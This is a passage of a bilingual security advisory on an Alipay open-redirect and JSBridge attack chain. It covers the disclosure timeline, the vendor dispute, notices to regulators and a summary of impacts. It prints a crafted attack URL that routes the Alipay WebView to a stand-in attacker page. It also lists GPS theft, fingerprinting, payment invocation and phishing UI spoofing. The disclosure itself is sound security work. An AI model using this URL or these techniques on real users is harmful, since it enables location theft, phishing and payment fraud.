<div><strong style="color:#ff6b35;">17个漏洞因此从"理论"变为"实战"。</strong>攻击者页面一旦加载到支付宝 WebView 中,即获得完整的 JSBridge API 访问权限——<strong>静默窃取 GPS 坐标、调用支付接口、打开相机、伪造 UI</strong>——全部通过一条链接完成。</div>
<div style="font-size:24px;text-align:center;">💬</div>
<div><strong style="color:#ff6b35;">厂商自己承认严重性。</strong>蚂蚁集团安全团队在与我们的通话中明确表示:<em>"如果能绕过我们的白名单限制,那就严重了"</em>。通话结束后不到 2 分钟,白名单即被绕过。<strong>厂商确认了严重性,但至今拒绝修复,称其为"正常功能"。</strong></div>
</div>
<div style="background:rgba(0,0,0,.3);border-radius:8px;padding:14px 16px;font-family:monospace;font-size:13px;overflow-x:auto;color:#ff8888;margin-top:4px;">
<div style="color:#9898a8;margin-bottom:6px;">// 任何人都可以构造的攻击链接:</div>
https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&amp;url=<span style="color:#ff4444;font-weight:bold;">https://attacker.com/payload.html</span>
</div>
</div>
<div class="en">
<div style="display:grid;grid-template-columns:40px 1fr;gap:8px 12px;align-items:start;margin-bottom:16px;">
<div style="font-size:24px;text-align:center;">🔑</div>
<div><strong style="color:#ff6b35;">This is the master key to the entire attack chain.</strong> Alipay uses a domain whitelist to restrict pages loadable in its WebView. However, its own domain <code style="background:#1a1a28;padding:2px 6px;border-radius:4px;color:#ff8888;">ds.alipay.com</code> has an open redirect vulnerability, allowing attackers to load arbitrary malicious pages through the whitelisted domain. <strong>Without this bypass, other vulnerabilities are LAN-only; with it, anyone can attack remotely.</strong></div>
<div style="font-size:24px;text-align:center;">👤</div>
<div><strong style="color:#ff6b35;">No developer permissions required.</strong> No Alipay Open Platform registration, no Mini Program developer credentials, no approval process. An attacker simply crafts a URL and sends it via WeChat, WhatsApp, SMS, or any messaging app.</div>
<div style="font-size:24px;text-align:center;">💣</div>
<div><strong style="color:#ff6b35;">17 vulnerabilities go from "theoretical" to "in-the-wild."</strong> Once the attacker's page loads inside Alipay's WebView, it gains full JSBridge API access — <strong>silently steal GPS coordinates, invoke payment interfaces, access the camera, spoof UI elements</strong> — all through a single link.</div>
<div style="font-size:24px;text-align:center;">💬</div>
<div><strong style="color:#ff6b35;">The vendor acknowledged the severity.</strong> Ant Group's security team stated during our call: <em>"If you can bypass our whitelist, that would be serious."</em> Less than 2 minutes after the call ended, the whitelist was bypassed. <strong>The vendor confirmed it was serious, yet still refuses to patch, calling it "normal functionality."</strong></div>
</div>
<div style="background:rgba(0,0,0,.3);border-radius:8px;padding:14px 16px;font-family:monospace;font-size:13px;overflow-x:auto;color:#ff8888;margin-top:4px;">
<div style="color:#9898a8;margin-bottom:6px;">// Attack URL anyone can construct:</div>
https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&amp;url=<span style="color:#ff4444;font-weight:bold;">https://attacker.com/payload.html</span>
</div>
</div>
</div>
</div>
<div class="container">
<!-- ==================== META ==================== -->
<section>
<table>
<tr>
<th style="width:160px">
<span class="zh">项目</span><span class="en">Field</span>
</th>
<th>
<span class="zh"></span><span class="en">Value</span>
</th>
</tr>
<tr><td><strong>Target</strong></td><td>com.eg.android.AlipayGphone v10.8.26.7000 / v10.8.30.8000</td></tr>
<tr><td><strong>APK Size</strong></td><td>210.5 MB (220,503,494 bytes)</td></tr>
<tr><td><strong>Platform</strong></td><td>Android 16 (API 36) + iOS 26.3.1</td></tr>
<tr>
<td><strong>
<span class="zh">分析日期</span><span class="en">Analysis Date</span>
</strong></td>
<td>2026-02-16 ~ 2026-03-07</td>
</tr>
<tr>
<td><strong>
<span class="zh">攻击前提</span><span class="en">Prerequisites</span>
</strong></td>
<td>
<span class="zh">非Root、非越狱、无特殊权限、仅需受害者点击一个链接</span>
<span class="en">No root, no jailbreak, no special permissions. Victim only needs to click one link.</span>
</td>
</tr>
<tr>
<td><strong>
<span class="zh">研究者</span><span class="en">Researcher</span>
</strong></td>
<td>Innora AI Security Research (feng@innora.ai)</td>
</tr>
</table>
</section>
<!-- ==================== TOC ==================== -->
<div class="toc">
<h3>
<span class="zh">目录</span><span class="en">Table of Contents</span>
</h3>
<ol>
<li><a href="#disclosure">
<span class="zh">披露时间线</span><span class="en">Disclosure Timeline</span>
</a></li>
<li><a href="#summary">
<span class="zh">核心发现摘要</span><span class="en">Executive Summary</span>
</a></li>
<li><a href="#chain">
<span class="zh">攻击链详解</span><span class="en">Attack Chain Details</span>
</a></li>
<li><a href="#poc">
<span class="zh">在线 PoC 演示</span><span class="en">Live PoC Demonstration</span>
</a></li>
<li><a href="#vulns">
<span class="zh">已验证安全问题</span><span class="en">Verified Security Issues</span>
</a></li>
<li><a href="#evidence">
<span class="zh">证据展示</span><span class="en">Evidence</span>
</a></li>
<li><a href="#devices">
<span class="zh">跨平台验证</span><span class="en">Cross-Platform Verification</span>
</a></li>
<li><a href="#ios">
<span class="zh">iOS 特有风险</span><span class="en">iOS-Specific Risks</span>
</a></li>
<li><a href="#defense">
<span class="zh">已生效的防护</span><span class="en">Working Defenses</span>
</a></li>
<li><a href="#vendor">
<span class="zh">厂商回应与讨论</span><span class="en">Vendor Response & Discussion</span>
</a></li>
<li><a href="#recommendations">
<span class="zh">修复建议</span><span class="en">Remediation Recommendations</span>
</a></li>
<li><a href="#user-defense">
<span class="zh">用户自我保护</span><span class="en">User Self-Protection</span>
</a></li>
<li><a href="#community-faq">
<span class="zh">社区质疑回应</span><span class="en">Community Questions & Responses</span>
</a></li>
<li><a href="#global-response">
<span class="zh">全球监管机构响应</span><span class="en">Global Regulatory Response</span>
</a></li>
<li><a href="#legal-response">
<span class="zh">法律回应</span><span class="en">Legal Response</span>
</a></li>
</ol>
</div>
<!-- ==================== 1. DISCLOSURE TIMELINE ==================== -->
<section id="disclosure">
<h2><span class="num">01</span>
<span class="zh">负责任披露时间线</span>
<span class="en">Responsible Disclosure Timeline</span>
</h2>
<div class="zh">
<p>我们始终遵循负责任的安全研究原则。在公开任何信息之前,已通过多个渠道向蚂蚁集团进行了完整的报告。</p>
</div>
<div class="en">
<p>We followed responsible disclosure principles throughout. Before any public discussion, full reports were submitted to Ant Group through multiple channels.</p>
</div>
<div class="timeline">
<div class="timeline-item">
<div class="timeline-date">2026-02-16</div>
<p>
<span class="zh">开始对 Alipay v10.8.30.8000 APK 进行静态分析</span>
<span class="en">Started static analysis of Alipay v10.8.30.8000 APK</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-02-25</div>
<p>
<span class="zh"><strong>第一次报告</strong> — TLS/SSL 中间人攻击 + 设备指纹问题,通过厂商安全应急响应中心(SRC)提交<br><em style="opacity:.7;font-size:.9em;">注:此次报告的是 TLS/SSL 相关问题DeepLink/JSBridge 攻击链尚未发现</em></span>
<span class="en"><strong>First Report</strong> — TLS/SSL MITM + device fingerprinting issues submitted via vendor's Security Response Center (SRC)<br><em style="opacity:.7;font-size:.9em;">Note: This report covered TLS/SSL issues only; the DeepLink/JSBridge attack chain had not yet been discovered</em></span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-06</div>
<p>
<span class="zh"><strong>AntSRC 回复</strong>"经过我们安全工程师审核,无法被实际利用"</span>
<span class="en"><strong>AntSRC Reply</strong>: "After review by our security engineers, [the issues] cannot be practically exploited"</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 04:08</div>
<p>
<span class="zh"><strong>第二次报告</strong> — 发现 DeepLink+JSBridge 攻击链,提交 8 个漏洞2 CRITICAL + 4 HIGH发送至厂商安全团队对接人</span>
<span class="en"><strong>Second Report</strong> — DeepLink+JSBridge attack chain discovered, 8 issues (2 CRITICAL + 4 HIGH) sent to vendor security contact</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 06:07</div>
<p>
<span class="zh"><strong>第三次报告V3</strong> — 扩展至 17 个漏洞,含资金操作风险 + 308 条服务器日志 + 42 张截图</span>
<span class="en"><strong>Third Report (V3)</strong> — Expanded to 17 issues including financial operation risks + 308 server logs + 42 screenshots</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 07:54</div>
<p>
<span class="zh"><strong>第四次报告</strong> — 端到端外部攻击完整演示3 台设备跨国验证(新西兰/马来西亚/中国),含在线复现链接</span>
<span class="en"><strong>Fourth Report</strong> — Full E2E external attack demo, 3 devices cross-country verification (NZ/MY/CN), with live reproduction URL</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 12:33</div>
<p>
<span class="zh"><strong>厂商回复</strong>"漏洞报告邮件已收到,我们会安排人尽快分析,完了给你回复"</span>
<span class="en"><strong>Vendor Reply</strong>: "Vulnerability report emails received, we will arrange someone to analyze ASAP and reply"</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 14:25</div>
<p>
<span class="zh"><strong>微信语音通话15分46秒</strong> — 厂商安全业务负责人在通话中辩称"局域网内本来就对这些功能开放",试图将攻击面限定为局域网场景。并暗示:<strong>"如果能绕过我们的白名单限制,那就严重了"</strong>。此前所有测试确实在局域网环境下(研究员本机与测试手机 Xiaomi Redmi 12 在同一 WiFi 网络PoC 页面部署在 192.168.80.12:8888</span>
<span class="en"><strong>WeChat Voice Call (15m 46s)</strong> — Vendor security lead argued that "these features are designed to be open within LAN" and attempted to frame the attack surface as LAN-only. The lead implied: <strong>"If you can bypass our whitelist, that would be serious."</strong> All prior testing had indeed been on a local network (researcher's machine and Xiaomi Redmi 12 test phone on the same WiFi), with PoC pages hosted at 192.168.80.12:8888</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 14:36</div>
<p>
<span class="zh"><strong>白名单绕过 — 2 分钟内完成</strong> — 通话结束后不到 2 分钟,我们即绕过了厂商自以为安全的白名单机制。绕过方法:利用 <code>ds.alipay.com/?scheme=</code> 开放重定向参数。该域名 (ds.alipay.com) 本身在 Alipay WebView 的白名单中,其 <code>?scheme=</code> 参数接受任意 URL 跳转,攻击者可构造 <code>https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&amp;url=https://evil.com/payload.html</code>URL 的 host 为白名单域名,但实际加载攻击者页面。<strong>这彻底否定了"局域网限定"的辩解</strong>——任何互联网上的页面都可以通过白名单域名跳转进入 Alipay WebView 并调用 JSBridge API</span>
<span class="en"><strong>Whitelist Bypass — Completed in Under 2 Minutes</strong> — Less than 2 minutes after the call ended, we bypassed the vendor's whitelist mechanism they believed was secure. Method: exploiting the <code>ds.alipay.com/?scheme=</code> open redirect parameter. The domain ds.alipay.com is itself whitelisted in Alipay's WebView, and its <code>?scheme=</code> parameter accepts arbitrary URL redirects. An attacker can craft <code>https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&amp;url=https://evil.com/payload.html</code> — the URL host is a whitelisted domain, but it actually loads the attacker's page. <strong>This completely invalidated the "LAN-only" defense</strong> — any page on the internet can use the whitelisted domain redirect to enter Alipay's WebView and invoke JSBridge APIs</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 15:01</div>
<p>
<span class="zh"><strong>公网 PoC 部署 + 第二次语音通话7分07秒</strong> — 将 PoC 部署至公网 <code>https://innora.ai/sec/trigger.html</code>(触发页)和 <code>https://innora.ai/sec/verify.html</code>(载荷页),发送给厂商安全人员验证。证明攻击在互联网环境下完全可行,不限于局域网</span>
<span class="en"><strong>Public PoC Deployment + Second Voice Call (7m 07s)</strong> — Deployed PoC to public internet at <code>https://innora.ai/sec/trigger.html</code> (trigger page) and <code>https://innora.ai/sec/verify.html</code> (payload page), sent to vendor security lead for verification. Proved the attack is fully viable over the internet, not limited to LAN</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 15:09</div>
<p>
<span class="zh"><strong>厂商安全人员亲测 — iPhone 从杭州连接</strong> — 服务器日志显示来自杭州(支付宝总部所在地)的 iPhone 17 Pro Max 连接GPS 定位 (30.3xxx, 120.1xxx) 精度 9.99m。设备有 2xxGB 存储、80% 电量。<strong>关键发现iOS 上有 18 个 JSBridge API 可用,比 Android (13 个) 多出 5 个高危 APItradePay、share、getLocation、scan、chooseImage</strong>。iOS 版 tradePay支付和 getLocation定位均可从外部页面直接调用而 Android 上这些 API 被拦截。这意味着 <strong>iOS 攻击面显著大于 Android</strong>,且 share API 可实现蠕虫式传播</span>
<span class="en"><strong>Vendor Security Lead Tests — iPhone Connects from Hangzhou</strong> — Server logs show iPhone 17 Pro Max connecting from Hangzhou (Alipay HQ city), GPS (30.3xxx, 120.1xxx) accuracy 9.99m. Device: 2xxGB storage, 80% battery. <strong>Critical discovery: 18 JSBridge APIs available on iOS vs 13 on Android — 5 additional high-risk APIs: tradePay, share, getLocation, scan, chooseImage</strong>. iOS tradePay (payment) and getLocation (GPS) can be invoked from external pages, while Android blocks them. This means <strong>iOS attack surface is significantly larger than Android</strong>, and the share API enables worm-like propagation</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-07 15:2817:03</div>
<p>
<span class="zh"><strong>V6 PoC + 多设备验证</strong> — 创建针对高影响力漏洞的 V6 版 PoC(1) 静默 GPS+设备指纹窃取 (2) 支付引导攻击 (3) UI 钓鱼 (4) 敏感页面跳转链 (5) share API 蠕虫传播iOS。测试账户因频繁触发风控被封锁委托新西兰朋友测试——正常触发。随后用妻子的 iPhone 验证——同样成功。厂商回复"OK我们分析下"</span>
<span class="en"><strong>V6 PoC + Multi-device Verification</strong> — Created V6 PoC targeting high-impact vulns: (1) silent GPS+device fingerprint theft (2) payment redirection attack (3) phishing UI (4) sensitive page redirect chains (5) share API worm propagation (iOS). Test account banned due to risk control triggers; delegated to friend in New Zealand — triggered successfully. Then verified with spouse's iPhone — also successful. Vendor replied "OK, let us analyze"</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-08</div>
<p>
<span class="zh"><strong>厂商第二轮验证</strong> — 安全业务负责人在杭州使用 iPhone 16 Pro 进行更深入测试。全程无任何 GPS 授权声明/弹窗,页面加载到 GPS 数据回传仅约 7 秒。3 轮测试精度从 17.4m 递进至 9.99m 再到 8.81m<code>locationReducedAccuracy: 0</code>(精确定位模式)。此轮测试进一步确认了前日发现的 iOS 攻击面问题,且证实 GPS 外泄在用户完全无感知的情况下发生</span>
<span class="en"><strong>Vendor Second-round Verification</strong> — Security business lead conducted deeper testing in Hangzhou with iPhone 16 Pro. Zero GPS authorization dialogs appeared throughout; GPS data transmitted within ~7 seconds of page load. 3-round accuracy improved from 17.4m to 9.99m to 8.81m, with <code>locationReducedAccuracy: 0</code> (precise mode). This round further confirmed the iOS attack surface discovered the previous day, and verified GPS exfiltration occurs with zero user awareness</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-09</div>
<p>
<span class="zh">测试账户被封锁(安全测试期间触发风控),发送账户解封申请</span>
<span class="en">Test account banned (risk control triggered during testing). Account unblock request sent.</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-10</div>
<p>
<span class="zh"><strong>厂商最终回复</strong>"根据我们的评估,这些属于正常功能"</span>
<span class="en"><strong>Vendor Final Response</strong>: "Based on our assessment, these are normal functionality"</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-11 ~18:03</div>
<p>
<span class="zh"><strong>微信对话</strong>截图泰国时间17:03+1h=北京时间)— 厂商对接人确认"正常功能"定性(回复"嗯"),我方告知将公开讨论。对接人在对话中使用了"洞"一词,说明内部对发现的安全属性并非毫无认知</span>
<span class="en"><strong>WeChat Conversation</strong> (screenshot in Thai timezone 17:03, +1h = Beijing time) — Vendor contact confirmed "normal functionality" classification. We notified intent to publish. The contact used the colloquial term "洞" (vulnerability) in conversation, suggesting internal awareness of the security nature of these findings</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-11 18:16</div>
<p>
<span class="zh"><strong>公开发布</strong> — 厂商明确拒绝修复后,公开研究成果</span>
<span class="en"><strong>Public Disclosure</strong> — After vendor explicitly refused to fix, research published</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-11 22:45</div>
<p>
<span class="zh"><strong>法律投诉</strong> — 文章发布仅4小时后北京格韵律师事务所代理厂商向微信公众平台投诉我们的文章"内容侵犯名誉/商誉/隐私/肖像"。讽刺的是:<strong>我们的文章从头到尾未出现"支付宝""Alipay""蚂蚁集团"中的任何一个词</strong>。投诉方通过发起投诉,反而自行确认了文章描述的行为与其所代理的企业相关。我们已提交申诉。</span>
<span class="en"><strong>Legal Complaint </strong> — Just 4 hours after publication, Beijing Geyun Law Firm (representing the vendor) filed a "content infringing reputation/goodwill/privacy/likeness" complaint against our WeChat article. The irony: <strong>our article never once mentions "Alipay," "支付宝," or "Ant Group" anywhere in the entire text</strong>. By filing this complaint, the complainant effectively self-identified their client as the subject of the article. We have filed an appeal.</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>CVE 提交6个漏洞等待确认中</strong> — 鉴于厂商阿里巴巴作为注册CNA编号CNA-2017-0006拒绝承认漏洞并拒绝分配CVE编号我们通过 MITRE CNA of Last Resort (CNA-LR) 路径分两批提交了6个独立CVE申请<br>
<strong>第一批5个</strong><br>
① DeepLink URL Scheme 访问控制绕过 (CWE-939, CVSS 9.1)<br>
② iOS GPS 静默外泄 — 无授权弹窗 (CWE-359, CVSS 7.4)<br>
③ iOS tradePay 未授权支付流程调用 (CWE-940, CVSS 8.6)<br>
④ UI 欺骗 — showToast/setTitle 伪造支付宝界面 (CWE-451, CVSS 8.1)<br>
⑤ 端到端敏感数据外泄 — 设备指纹+权限状态 (CWE-200, CVSS 8.6)<br>
<strong>第二批1个</strong><br>
⑥ ds.alipay.com 开放重定向绕过白名单机制 (CWE-601+CWE-939, CVSS 9.3) — 利用白名单域名 ds.alipay.com 的 <code>?scheme=</code> 参数实现开放重定向,彻底绕过厂商域名白名单防护,使任何互联网页面均可通过白名单域名跳转链进入 WebView 调用全部 JSBridge API。此绕过在与厂商安全团队通话期间 2 分钟内完成<br>
Credit: Jiqiang Feng (Innora AI Security Research)。等待 MITRE 回复确认中。</span>
<span class="en"><strong>CVE Submission (6 Vulnerabilities, Awaiting Confirmation)</strong> — Since the vendor (Alibaba, a registered CNA: CNA-2017-0006) refused to acknowledge the vulnerabilities and declined to assign CVE IDs, we submitted 6 independent CVE requests in two batches through MITRE's CNA of Last Resort (CNA-LR) pathway:<br>
<strong>Batch 1 (5 CVEs):</strong><br>
① DeepLink URL Scheme Access Control Bypass (CWE-939, CVSS 9.1)<br>
② iOS Silent GPS Exfiltration — No Authorization Prompt (CWE-359, CVSS 7.4)<br>
③ iOS tradePay Unauthorized Payment Flow Invocation (CWE-940, CVSS 8.6)<br>
④ UI Spoofing — showToast/setTitle Fake Alipay Interface (CWE-451, CVSS 8.1)<br>
⑤ End-to-End Sensitive Data Exfiltration — Device Fingerprint + Permission States (CWE-200, CVSS 8.6)<br>
<strong>Batch 2 (1 CVE):</strong><br>
⑥ ds.alipay.com Open Redirect Whitelist Bypass (CWE-601+CWE-939, CVSS 9.3) — Exploits the <code>?scheme=</code> parameter on whitelisted domain ds.alipay.com to perform an open redirect, completely bypassing the vendor's domain whitelist protection. Any internet-hosted page can chain through the whitelisted domain to enter WebView and invoke all JSBridge APIs. This bypass was achieved in under 2 minutes during a live call with the vendor security team<br>
Credit: Jiqiang Feng (Innora AI Security Research). Awaiting MITRE confirmation.</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>全球通知</strong> — 向 23 个金融监管机构、13 个国家 CERT、14 家竞争对手安全团队、50+ 家国际媒体发送漏洞披露通知</span>
<span class="en"><strong>Global Notification</strong> — Vulnerability disclosure sent to 23 financial regulators, 13 national CERTs, 14 competitor security teams, and 50+ international media outlets</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>新加坡 PDPC 正式立案调查</strong> — 新加坡个人数据保护委员会 (PDPC) 回复确认已开启正式调查</span>
<span class="en"><strong>Singapore PDPC Formal Investigation</strong> — Singapore's Personal Data Protection Commission confirmed opening a formal investigation </span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>Google Play 启动调查</strong> — 向 Google Play 提交正式政策违规举报违反用户数据政策、权限政策、欺骗行为政策Google 确认收到并回复:"We will investigate and take appropriate action"</span>
<span class="en"><strong>Google Play Investigation</strong> — Formal policy violation report submitted to Google Play (User Data, Permissions, Deceptive Behavior policies). Google confirmed: "We will investigate and take appropriate action" </span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>Apple Product Security 启动调查</strong> — Apple 产品安全团队人工回复Brent确认已将报告转发给相关调查团队。Apple 正在调查 Alipay iOS 端 JSBridge 暴露的 tradePay支付、scan扫码、chooseImage相机等高危 API</span>
<span class="en"><strong>Apple Product Security Investigation</strong> — Apple Product Security responded (Brent): "Your report was forwarded along to the appropriate team for investigation." Apple is investigating Alipay iOS JSBridge exposure of tradePay, scan, chooseImage APIs </span>
</p>
</div>
<div class="timeline-item" style="background: linear-gradient(135deg, rgba(0,200,83,0.08), rgba(0,200,83,0.02)); border-left-color: #00c853;">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>Packet Storm Security 公开收录</strong> — 漏洞通告被 Packet Storm Security全球知名漏洞数据库正式收录并发布<br><a href="https://packetstorm.news/files/id/217089" target="_blank" style="color:#00c853;font-weight:bold;">https://packetstorm.news/files/id/217089</a><br>标题:"Alipay Open Redirect / API Attacker Payload Insertion"</span>
<span class="en"><strong>Packet Storm Security Publication</strong> — Advisory officially published on Packet Storm Security (major global vulnerability database):<br><a href="https://packetstorm.news/files/id/217089" target="_blank" style="color:#00c853;font-weight:bold;">https://packetstorm.news/files/id/217089</a><br>Title: "Alipay Open Redirect / API Attacker Payload Insertion"</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>HKCERT → CNCERT</strong> — 香港计算机应急协调中心 (HKCERT) 确认已将报告转交中国国家网络安全应急响应中心 (CNCERT)</span>
<span class="en"><strong>HKCERT → CNCERT</strong> — Hong Kong CERT confirmed forwarding the report to China National CERT (CNCERT)</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-12</div>
<p>
<span class="zh"><strong>荷兰央行 (DNB) 正式回复</strong> — 指出 CSSF 卢森堡为 Alipay 欧洲的主要监管机构,提供 GDPR 第32条处理安全性违规执法路径。CERT-Luxembourg (CIRCL) 事件处理分析师 a CIRCL incident handler 确认将寻找 Alipay 欧洲实体联系人转发报告</span>
<span class="en"><strong>DNB Netherlands Formal Response</strong> — Identified CSSF Luxembourg as Alipay Europe's Primary Supervisory Authority, provided GDPR Article 32 enforcement pathway. CERT-Luxembourg (CIRCL) incident handler a CIRCL incident handler confirmed locating appropriate Alipay European entity contact to forward the report</span>
</p>
</div>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-15</div>
<p>
<span class="zh"><strong>CERT Polska 正式受理</strong> — 波兰国家CERT已受理事件开始按程序处理分配Ticket #554****57</span>
<span class="en"><strong>CERT Polska Accepted</strong> — Poland national CERT accepted the case, began incident handling procedures, Ticket #554****57</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-15</div>
<p>
<span class="zh"><strong>PCPD 香港个人资料私隐专员公署</strong> — 确认收到报告,将跟进并回复</span>
<span class="en"><strong>PCPD Hong Kong Privacy Commissioner</strong> — Confirmed receipt, will follow up and respond</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-15</div>
<p>
<span class="zh"><strong>AZOP 克罗地亚个人数据保护局</strong> — 已收到报告,正在处理</span>
<span class="en"><strong>AZOP Croatia Data Protection Agency</strong> — Report received, being processed</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-16</div>
<p>
<span class="zh"><strong>SingCERT/CSA 新加坡网络安全局</strong> — 确认收到漏洞报告建议跟进MITRE CVE分配</span>
<span class="en"><strong>SingCERT/CSA Singapore</strong> — Confirmed receipt of vulnerability report, advised to follow up with MITRE on CVE assignment</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-16</div>
<p>
<span class="zh"><strong>HKMA 香港金管局正式转交</strong> — 投诉已正式转交 Alipay Financial Services (HK) Limited 跟进处理HKMA将监督持牌机构处理并在必要时采取行动</span>
<span class="en"><strong>HKMA Formal Referral</strong> — Complaint formally referred to Alipay Financial Services (HK) Limited for follow-up. HKMA will monitor licensee handling and take appropriate actions as necessary</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-16</div>
<p>
<span class="zh"><strong>DPC 爱尔兰数据保护委员会</strong> — 立案 DPC032****957因管辖权问题建议联系当地DPA</span>
<span class="en"><strong>DPC Ireland</strong> — Case DPC032****957 opened, referred to local DPA due to jurisdiction</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-16</div>
<p>
<span class="zh"><strong>ANSSI/CERT-FR 法国</strong> — 正式回复:该应用在法国用户较少,不采取进一步行动</span>
<span class="en"><strong>ANSSI/CERT-FR France</strong> — Formal response: app has limited French user base, no further action planned</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-17</div>
<p>
<span class="zh"><strong>AP 荷兰数据保护局</strong> — 正式受理GDPR投诉</span>
<span class="en"><strong>Dutch DPA (Autoriteit Persoonsgegevens)</strong> — Formally received GDPR complaint</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-17</div>
<p>
<span class="zh"><strong>FCA 英国金融行为监管局</strong> — 参考号 2121****43信息已记录并用于监管工作</span>
<span class="en"><strong>FCA UK</strong> — Reference 2121****43, information recorded and used in supervisory work with authorised firms</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-17</div>
<p>
<span class="zh"><strong>DNB 荷兰央行</strong> — 确认邮件已受理处理中</span>
<span class="en"><strong>DNB Netherlands Central Bank</strong> — Email received and being processed</span>
</p>
</div>
<div class="timeline-item">
<div class="timeline-date">2026-03-17</div>
<p>
<span class="zh"><strong>新增CVE提交</strong> — 针对支付宝应用新发现的安全问题已向MITRE提交额外CVE申请详情暂不公开</span>
<span class="en"><strong>Additional CVE Submission</strong> — New CVE application submitted to MITRE for additional security issues discovered in the Alipay application (details withheld pending assignment)</span>
</p>
</div>
</section>
<!-- ==================== 2. EXECUTIVE SUMMARY ==================== -->
<section id="summary">
<h2><span class="num">02</span>
<span class="zh">核心发现摘要</span>
<span class="en">Executive Summary</span>
</h2>
<div class="zh">
<p>支付宝的 <code>alipays://</code> DeepLink scheme 允许任何第三方应用或网页将用户引导到支付宝的 Nebula WebView 容器,加载<strong>攻击者控制的外部网页</strong>。一旦加载,攻击者的 JavaScript 代码可以调用 <code>AlipayJSBridge</code> API执行一系列危险操作</p>
<ul>
<li><strong>窃取精确GPS定位</strong> — 在用户已授予支付宝位置权限的前提下外部页面调用getLocation无任何二次确认弹窗坐标直接回传攻击者服务器</li>
<li><strong>窃取完整设备指纹</strong> — 品牌/型号/OS/存储/电量/蓝牙/WiFi/权限状态 30+ 字段</li>
<li><strong>打开转账页面并预填攻击者收款账号和金额</strong>最终确认仍需用户点击但配合UI欺骗可大幅降低警惕性</li>
<li><strong>触发支付SDK弹出支付界面</strong> — tradePay API 唤起收银台用户仍需手动确认但UI可被高度仿真</li>
<li><strong>跳转18个敏感内部页面</strong> — 交易记录、银行卡管理、芝麻信用、提现、亲情号等</li>
<li><strong>显示虚假转账通知</strong> — 在支付宝内伪造 "转账 ¥5,000 到 张*明 成功"</li>
<li><strong>篡改标题栏为"安全中心"</strong> — 增强钓鱼可信度</li>
<li><strong>跳转到支付宝登录页面</strong> — 创建完美的凭据钓鱼入口</li>
<li><strong>链式加载更多恶意页面</strong> — 每个新页面都可再次调用全部 API</li>
</ul>
<p>攻击条件极低:<strong>受害者只需点击一个链接</strong>。无需Root、无需越狱、无需安装任何应用。链接可通过短信、微信、QQ、邮件、二维码等任何渠道传播。</p>
</div>
<div class="en">
<p>Alipay's <code>alipays://</code> DeepLink scheme allows any third-party app or webpage to direct users into Alipay's Nebula WebView container, loading <strong>attacker-controlled external web pages</strong>. Once loaded, the attacker's JavaScript can call <code>AlipayJSBridge</code> APIs to perform dangerous operations:</p>
<ul>
<li><strong>Steal precise GPS location</strong> — When location permission is already granted to Alipay, external pages calling getLocation get coordinates with no secondary consent dialog, sent directly to attacker server</li>
<li><strong>Steal complete device fingerprint</strong> — Brand/model/OS/storage/battery/Bluetooth/WiFi/permissions, 30+ fields</li>
<li><strong>Open transfer page with pre-filled attacker account and amount</strong> (final confirmation still requires user tap, but combined with UI spoofing can greatly reduce vigilance)</li>
<li><strong>Trigger payment SDK to launch payment UI</strong> — tradePay API invokes cashier (user must still confirm, but UI can be highly spoofed)</li>
<li><strong>Navigate to 18 sensitive internal pages</strong> — Transaction history, bank cards, credit score, withdrawal, family accounts, etc.</li>
<li><strong>Display fake transfer notifications</strong> — Forge "Transfer CNY 5,000 to Zhang*Ming completed" inside Alipay</li>
<li><strong>Spoof title bar to "Security Center"</strong> — Enhance phishing credibility</li>
<li><strong>Redirect to Alipay login page</strong> — Create perfect credential phishing entry point</li>
<li><strong>Chain-load more malicious pages</strong> — Each new page can call all APIs again</li>
</ul>
<p>Attack prerequisites are minimal: <strong>victim only needs to click one link</strong>. No root, no jailbreak, no app installation required. The link can be distributed via SMS, WeChat, QQ, email, QR codes, or any other channel.</p>
</div>
</section>
<!-- ==================== 3. ATTACK CHAIN ==================== -->
